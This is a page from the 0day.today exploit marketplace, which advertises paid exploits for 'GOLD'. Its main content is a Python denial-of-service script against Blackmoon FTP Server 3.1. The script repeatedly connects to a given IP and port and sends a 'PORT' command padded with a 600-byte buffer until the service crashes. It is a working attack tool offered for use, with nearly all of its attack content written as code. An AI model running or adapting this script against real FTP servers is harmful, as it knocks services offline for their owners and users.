0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Blackmoon FTP 3.1 Build 1735,1736 DOS
#!/usr/bin/python # Exploit Title: BlackmoonFTP Server DOS # Author: Craig Freyman (cd1zz) # Software Link: http://www.mediafire.com/?bnc4d00myymmx55 # Version: 3.1 Release 6 - Build 1735 and 1736 # Tested On: Windows XP SP3 # Vendor Contacted: 12/28/2010 # Vendor Fixed: 1/13/2011 import socket import sys buffer = '\x41' * 600 counter = 1 if len(sys.argv) != 3: print "Usage: ./blackmoonDOS.py <ip> <port>" sys.exit() ip = sys.argv[1] port = sys.argv[2] while counter <= 300: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "[*] Sending evil buffer. Count " + str(counter) + " out of 300" s.connect((ip,int(port))) s.recv(1024) s.send('PORT ' + buffer + '\r\n') s.recv(1024) s.send('QUIT \r\n') s.recv(1024) s.close() counter=counter+1 except: print "Check the service - probably dead!" sys.exit() # 0day.today [2024-11-16] #